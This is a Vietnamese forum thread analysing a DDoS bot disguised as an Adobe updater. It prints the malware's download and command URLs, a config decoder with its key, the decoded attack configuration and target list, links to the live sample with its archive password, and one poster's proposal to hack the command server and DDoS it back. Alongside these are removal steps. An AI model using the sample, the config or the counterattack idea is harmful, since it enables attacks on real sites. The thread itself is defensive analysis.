<![CDATA[Latest posts for the topic "Phân tích tính chất vài trận DDoS HVA vừa qua."]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.secureworks.com/research/threats/vecebot/?threat=vecebot. Con bot dùng để tấn công HVA cũng nhận chỉ thị từ một file cấu hình xml như con vecebot. - Con bot dùng để tấn công HVA cũng sử dụng hàng loạt các User-Agent giả mạo để qua mặt hệ thống cản lọc. Những User-Agent được sử dụng y hệt như những User-Agent đã từng tấn công các trang web và các blogs "lề trái". Theo nguồn tin chưa kiểm chứng, vietnamnet cũng đã từng bị DDoS với cùng tính chất như trên. - Con bot này cũng có thể được khởi động hoặc ngưng lại một cách dễ dàng và nhanh chóng. Điều này biểu hiện qua hiện tượng DDoS đột ngột xảy ra và đột ngột ngưng lại. Trong khi chờ đợi thu thập thêm thông tin để đối chiếu và kiểm chứng. Tôi tạm công bố một số thông tin như trên. Hãy đón xem các thông tin khác sẽ được cập nhật. Xin cám ơn các anh chị em đã nhanh chóng thu thập và cung cấp những thông tin cực kỳ quý giá. PS: HVA chắc chắn sẽ tiếp tục bị DDoS nhằm "bịt miệng" những công bố xuyên qua phân tích và RE.]]> /hvaonline/posts/list/39641.html#243872 /hvaonline/posts/list/39641.html#243872 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. anh ạ, anh chắc còn nhớ vụ GoogleCrashHandle , cái vụ mà em post bên xxxxxx forum, bạn xxxxx đòi giải thích, em tức nên không post nữa... smilie Thực ra cái file ấy, nó còn nhiều chỗ hay lắm. Con ấy nó download về một con khác , chính nó là thủ phạm DDoS Vietnamnet. Nhưng vì đang tức nên em chả viết tiếp. Hồi ấy, cũng rảnh nên em có làm thử 1 cái , mà em bắt chước ở đây https://zeustracker.abuse.ch/ đại khái là tool để track, để theo dõi các mạng botnet, tuy không được hoành tránh như người ta nhưng em cũng sướng lắm smilie) Trong con đó có 1 cái link, là http://penop.net/top.jpg, hồi đó không tải được, nhưng mà mấy hôm nay tự nhiên lại thấy báo có mẫu mới, về giải mã ra ( xor 0x19 theo byte ) thì được 1 link khác để tải cái con VB này về http://penop.net/images01.gif Chính con VB này đang DoS HVA, anh và các anh HVA xem thế nào, dập được server của nó thì tốt quá ! Em gửi anh bộ mẫu, cùng cái file cấu hình, file giải mã cấu hình, anh xem thử xem UserAgent : An0nym0453 http://direct.aliasx.net/xc.jpg <<< Link tải file cấu hình của nó, là định dạng XML http://direct.aliasx.net/xv.jpg <<< File này ghi ngày giờ, để làm gì thì em chịu Link mẫu: http://ifile.it/q13g05h Pass giải nén là: "5D1DCCDA70433CFC795F6D03459B258D"   ]]> /hvaonline/posts/list/39641.html#243880 /hvaonline/posts/list/39641.html#243880 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Chính là cái file viết bằng VB ấy ạ : AcrobatUpdater.exe. Nó làm nhiệm vụ tân công. Kịch bản thế này ạ: Nó vào cái http://direct.aliasx.net/xc.jpg để tải file cấu hình này về. File này được mã hoá, thuật toán XOR thôi nhưng cũng không đơn giản lắm. Sau đó Bot sử dụng các lớp để parse XML, lấy thông tin, UserAgent, .... rồi tấn công, giống như 1 người dùng bình thường duyệt web và click vào link ấy. Em chỉ hiểu cách nó tấn công là mô phỏng trình duyệt và người dùng lướt web, chứ chống lại thế nào thì em chịu, không có kinh nghiệm. còn http://direct.aliasx.net/xv.jpg là file chứa ngày giờ, chẳng hiểu để làm gì 2 thằng này anh phải dùng UserAgent là An0nym0453 thì mới lấy được nhé. Dùng cái khác là nó trả về mã 403 ngay smilie Cái phức tạp của con này là dùng VB để code, đọc thấy oải. Sau 1 tối ngồi không, em cũng RCE xong. Code giải mã file cấu hình đây, cũng không dài, nhưng chả hiểu hôm qua lơ mơ thế nào em viết thiếu 1 chỗ, nên nếu giải mã vẫn sai đôi chút, giờ thì chắc chắn rồi. Hệ thống tracker trên máy em vẫn định kì download cái file cấu hình và tìm sự thay đổi, nếu có em lại báo anh biết. Hiện giờ nó vẫn tấn công HVA Em có ý này, nếu mà các anh có thể xâm nhập được vào cái direct.aliasx.net. hay mình up file cấu hình của mình lên, với target chính là direct.aliasx.net. Cho các bạn ấy biết thế nào là bị DDoS 1 lần. Gậy ông đập lưng ông mà smilie Code: #include <Windows.h> #include <stdio.h> int main(int argc, char* argv[]) { FILE *f; int i; char *pBuffer; long lSize; int iKeySize; char szKey[] = "!asDPSk!@sakkf#!@kskdk12#@!#231saad2asdsD"; //key giai ma char szOutPut[MAX_PATH] = ""; if ((argc <2) || (argc >3 )) { printf("Usage: Decode <Encrypted> <Result>"); exit(1); } if (argc == 2) { strcpy(szOutPut, "Decoded.txt"); } else strncpy(szOutPut, argv[2],MAX_PATH); f = fopen(argv[1], "rb"); //doc file da ma hoa if (f) { fseek(f, 0, SEEK_END); lSize = ftell(f); fseek(f, 0, SEEK_SET); pBuffer = new char[lSize]; if(pBuffer) { fread((char*)pBuffer, lSize, 1, f); iKeySize = lstrlenA(szKey); for (i = 0; i < lSize; ++i) { pBuffer[i] ^= szKey[(i%iKeySize+1)%iKeySize ]; //giai ma file } } fclose(f); if (pBuffer) { f = fopen(szOutPut, "wb"); if (f) { fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma fclose(f); } else printf("Can not open output file."); free(pBuffer); } } else printf("Can not open input file."); return 0; }   ]]> /hvaonline/posts/list/39641.html#243881 /hvaonline/posts/list/39641.html#243881 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. AcrobatReader.exe có file size = 282624 bytes. Viết = VB 6, nhưng lại build trên máy Win7 64bit. Build date: 16/06/2011, 04:18:01. Bất cứ bà con nào đang xem topic này, search ngay trên máy mình file trên, cùng các file AdobeUpdater.exe, wcsntfy.* (tức tất cả các file wcsntfy, đuôi là gì không care), kill process và xoá ngay lập tức. Tool xoá: IceSword, GMER, Unlocker, Rootkit Unhooker.... Thà giết lầm còn hơn bỏ sót anh em. Nếu lỡ trùng file tốt, không sao. Dẹp mấy cái auto update Exe đi, autorun chỉ làm chậm máy, chiếm connection. Và đề nghị anh em post danh sách các file trên lên các blog, forum # để tuyên truyền, khuyên, giúp đỡ mọi người khác, quen hay không quen cũng không sao: Tìm và diệt ngay các file này. Và đây là nội dung file .xml ra lệnh của tụi STL: Code:
<?xml version="1.0" encoding="UTF-8"?>
<anonymous maxCrawling="100" resolveTimeout="0" connectionTimeout="10000" sendTimeout="15000" receiveTimeout="90000">
	<useragents><![CDATA[Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729;
Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10]]></useragents>
	<headers>
		<item id="Firefox" enabled="yes">
			<item name="Host" value=""/>			
			<item name="User-Agent" value=""/>
			<item name="Accept" value="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"/>
			<item name="Accept-Language" value="en-us,en;q=0.5"/>
			<item name="Accept-Encoding" value=""/>
			<item name="Accept-Charset" value="ISO-8859-1,utf-8;q=0.7,*;q=0.7"/>
			<item name="Keep-Alive" value="300"/>
			<item name="Connection" value="keep-alive"/>
		</item>
		<item id="MSIE" enabled="yes">
			<item name="Accept" value="image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*"/>
			<item name="Accept-Language" value=" en-us"/>
			<item name="Accept-Encoding" value=""/>
			<item name="User-Agent" value=""/>
			<item name="Host" value=""/>
			<item name="Connection" value="Keep-Alive"/>
		</item>
		<item id="Opera" enabled="yes">
			<item name="User-Agent" value=""/>
			<item name="Host" value=""/>			
			<item name="Accept" value="text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"/>
			<item name="Accept-Language" value="en-US,en;q=0.9"/>
			<item name="Accept-Charset" value="iso-8859-1, utf-8, utf-16, *;q=0.1"/>
			<item name="Accept-Encoding" value=""/>
			<item name="Connection" value="Keep-Alive"/>
		</item>
		<item id="Chrome" enabled="yes">
			<item name="Host" value=""/>
			<item name="Connection" value="keep-alive"/>
			<item name="Accept" value="application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"/>
			<item name="User-Agent" value=""/>
			<item name="Accept-Encoding" value=""/>
			<item name="Accept-Language" value="en-US,en;q=0.8"/>
			<item name="Accept-Charset" value="ISO-8859-1,utf-8;q=0.7,*;q=0.3"/>
		</item>
		<item id="Safari" enabled="yes">
			<item name="Host" value=""/>			
			<item name="User-Agent" value=""/>
			<item name="Accept" value="application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"/>
			<item name="Accept-Language" value="en-US"/>
			<item name="Accept-Encoding" value=""/>
			<item name="Connection" value="keep-alive"/>
		</item>
	</headers>
	<targets>
<item enabled="0" threads="1" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/forums/list.html" keepCookies="1" crawling="1" referer="/"/>
<item enabled="0" threads="3" delay="5" method="GET" protocol="http" host="www.boxitvn.net" port="80" uri="/" keepCookies="1" crawling="1"/>
<item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="danlambaovn.blogspot.com" port="80" uri="/" keepCookies="1" crawling="1"/>
<item enabled="0" threads="3" delay="5" method="GET" protocol="http" host="boxitvn.wordpress.com" port="80" uri="/" keepCookies="1" crawling="1"/>
		</targets>
</anonymous>
Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em ! Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận. useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này.]]>
/hvaonline/posts/list/39641.html#243882 /hvaonline/posts/list/39641.html#243882 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
2011-07-20 16:28:52
Ê, đệ tử, xem trong file xv.jpg nè, tao ra lệnh mày đúng hay quá giờ đó là stop tấn công với các chỉ dẩn từ xc.jpg nghe chưa. Dạ thưa sếp STL, em nghe lệnh. Thằng chủ nhân cái máy này nó không biết đâu, nó là zoombies của "Sống chết theo lệnh" tụi mình mà, he he !!!??? File Exe bot + config của nó em post ở đây: http://www.mediafire.com/?c57bbuc7iwq3ca4 Trong file này còn có file Decode.exe và source Decode.cpp để decode nội dung file xc.jpg ra file .xml để bà con xem. File IDA 61 database chứa thông tin disassembly của con AcrobatUpdater.exe, file images01.gif là chính là file AcrobatUpdater.exe với toàn bộ nội dung đã bị xor với 0x19.]]>
/hvaonline/posts/list/39641.html#243884 /hvaonline/posts/list/39641.html#243884 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://danlambaovn.blogspot.com/ http://danlambaovn.blogspot.com/2011/07/bat-tay-nhau-thang-7.html http://danlambaovn.blogspot.com/p/vuot-tuong-lua.html http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#more http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#disqus_thread http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#more http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#disqus_thread http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html#more Zombies connect đến: 174.142.132.185 ở cổng 80 và liên lạc với 2 files: xv.jpgxc.jpg. Người dùng bình thường không thể truy cập trực tiếp vào 2 files này. Chỉ có zombies với giá trị "User-Agent" đặc biệt mới có thể truy cập và nhận mệnh lệnh. Khi con malware này được cấy vào máy, có ít nhất là 3 registry keys được điều chỉnh: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Volatile Environment] CURRENT = "2011-07-20 16:28:52" DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15..... nhằm mục đích thực hiện ngay công tác "tàn phá" khi máy được khởi động. Con malware này còn connect đến 1 địa chỉ của google: 74.125.47.132, không biết để làm gì? ]]> /hvaonline/posts/list/39641.html#243888 /hvaonline/posts/list/39641.html#243888 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://danlambaovn.blogspot.com/2011/07/than-gui-cac-bac-cam.html Bị đánh bắt đầu vào ngày 19 hôm kia. Kinh thật !]]> /hvaonline/posts/list/39641.html#243890 /hvaonline/posts/list/39641.html#243890 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
(để ý cái "User-Agent" đặc biệt). Sau đó thì nhận chỉ thị:
Hoá ra 74.125.47.132 là IP của google đang host cái blog của danlambaovn. Thật ra với lượng traffic ập vào HVA, chỉ cần wwwect đến "mother" thì chỉ cần 30 giây là "mother" chết queo nhưng ai lại đi làm như vậy hở? :P ]]>
/hvaonline/posts/list/39641.html#243893 /hvaonline/posts/list/39641.html#243893 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243896 /hvaonline/posts/list/39641.html#243896 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau: 1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra. 2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe. 3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm. 4. Xoá nó ngay. 5. Vào registry và xoá các key sau: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Volatile Environment] CURRENT = "2011-07-20 16:28:52" DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15 ]]> /hvaonline/posts/list/39641.html#243901 /hvaonline/posts/list/39641.html#243901 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em ! Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận. useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này. 
Em cũng là độc giả của bên danlambaovn. bên đó cũng mới thông báo hôm trước là bị DDoS rất nặng, và em cũng đoán là do tụi chó STL làm. ai dè anh em bên HVA RE ra mấy cái liên quan đến DDoS HVA cũng lòi ra thủ phạm DDoS danlambaovn. danlambaovn có sử dụng blogspot của google. vậy nếu bên STL tiếp tục DDoS với cường độ mạnh thì bên danlambaovn nên thông báo và nhờ google giúp đỡ hay làm như nào để chống? vì đây là sử dụng blog của google nên chắc không được động vào server của google :D hay là băng thông của google rất lớn nên bọn STL DDoS sẽ không "Xi nhê". PS: Việc STL DDoS danlambaovn càng chứng tỏ tụi này được Government thuê ... hoặc là được mấy thằng tầu đào tạo để về đánh người nhà?]]>
/hvaonline/posts/list/39641.html#243903 /hvaonline/posts/list/39641.html#243903 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243906 /hvaonline/posts/list/39641.html#243906 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243907 /hvaonline/posts/list/39641.html#243907 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243908 /hvaonline/posts/list/39641.html#243908 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243909 /hvaonline/posts/list/39641.html#243909 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243910 /hvaonline/posts/list/39641.html#243910 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243911 /hvaonline/posts/list/39641.html#243911 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243912 /hvaonline/posts/list/39641.html#243912 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243913 /hvaonline/posts/list/39641.html#243913 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243914 /hvaonline/posts/list/39641.html#243914 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243915 /hvaonline/posts/list/39641.html#243915 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243916 /hvaonline/posts/list/39641.html#243916 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243919 /hvaonline/posts/list/39641.html#243919 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243922 /hvaonline/posts/list/39641.html#243922 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243928 /hvaonline/posts/list/39641.html#243928 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
<targets>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="Postmodenism_tiep_tuc_viet_ky_su.[^.^]" port="80" uri="/" keepCookies="1" crawling="1" referer=""/>
</targets>
]]>
/hvaonline/posts/list/39641.html#243930 /hvaonline/posts/list/39641.html#243930 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243932 /hvaonline/posts/list/39641.html#243932 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243933 /hvaonline/posts/list/39641.html#243933 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#243934 /hvaonline/posts/list/39641.html#243934 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tui thì không đứng về bên nào cả, bên nào làm sai thì lên tiếng đã kích. "Trong chính có tà, trong tà có chính", như Đông Phương Bất Bại hồi xưa thôi. Việc STL là của ai, ai nuôi, ai ra lệnh thì tới bây giờ vẫn nằm trong vòng bí mật, có người biết cũng không dám nói. Bổn phận của chúng ta, dân làm IT, kỹ thuật, chỉ nên đơn thuần phân tích, RE, truy lùng dấu vết của tụi nó. Còn việc sau đó nữa thì có người khác lo, hay không lo thì cũng phải chịu. Nếu chỉ vì sợ hãi tui nó hay thế lực đứng sau tụi nó mà chúng ta phải im lặng trước các hành động dơ bẩn, thối nát, không giống ai, không giống nước nào trên thế giới (trừ vài nước) thì chính ta đã vô tình im lặng, tiếp tay cho chúng phá hoại nền IT, cuộc sống, Internet của nước nhà, chính là tiếp tay cho tội ác. Tới bây giờ, chúng ta vẫn làm đúng, vẫn không đụng chạm đến ai cả. Nếu có ai đó hô lên, ê, tụi HVA kia, mày đụng chạm đến tao thì chính hắn đang phơi bày bộ mặt thật, chân tướng thật của hắn, của thế lực đứng sau hắn ra. Chỉ mong các admin HVA chân cứng đá mềm, tiếp tục đấu tranh chống lại đại dịch này. Còn về tại sao các mẫu bot của tụi nó vẫn không bị phát hiện, theo ý em: 1. VN ta là vùng trũng về IT của thế giới. Các tổ chức bảo mật, AVs nghe tới VN ta là ngán, là lơ luôn. Sống chết mặc bay. 2. Có bao nhiêu người dùng có bản quyền của các AVs để upload mẫu mà họ nghi ngờ lên các AVs đấy. Toàn là dùng cờ rắc, dùng key chùa, key lậu. Có bao nhiêu người dùng có khả năng phân tích kỹ thuật để nghi ngờ file đó là STL's "mèo què". 3. Sự "nổ", sự thổi phồng quá đáng, sự im lặng, bao che của nhiều tổ chức An ninh mạng, các AVs trong nước có thẩm quyền. Đôi khi họ muốn diệt, nhưng vì lý do gì đó mà họ không được diệt đám "mèo què" này. 4. Sự vô cảm, sống chết mặc bay. Em bỏ công lên các forum em tham gia, hô hào bà con tự tìm diệt, up mẫu, vậy mà chỉ nhận được các reply vô cảm cực kỳ, đông ke ! Tới bây giờ, em mới thấy buồn và nãn cho cái nghề IT, nền IT của nước nhà. Em bỏ nghề là đúng ! 
Đừng nản em. Ở thời điểm này, có rất nhiều người đồng cảm với việc làm của mình và cũng có rất nhiều người phỉ nhổ những trò tồi bại nhưng họ không công khai biểu lộ. Nếu mình không làm thì có lẽ chẳng có ai làm hết. Những biện pháp mình làm ở đây đa phần nằm trong diện "reactive" chớ không phải "proactive" bởi vì mình chẳng có một cơ quan hoặc tổ chức nào để nhờ cậy hết. Tuy vậy, nó cũng góp phần làm sạch một phần nào đó tính nhớp nhúa. Biện pháp duy nhất là cảnh sát Canada, FBI Mỹ và nhà nước VN phối hợp thộp cổ đám phá hoại trong bóng tối này và cho mỗi ông một chục xấp lịch để đếm là yên chuyện. ]]>
/hvaonline/posts/list/39641.html#243937 /hvaonline/posts/list/39641.html#243937 GMT
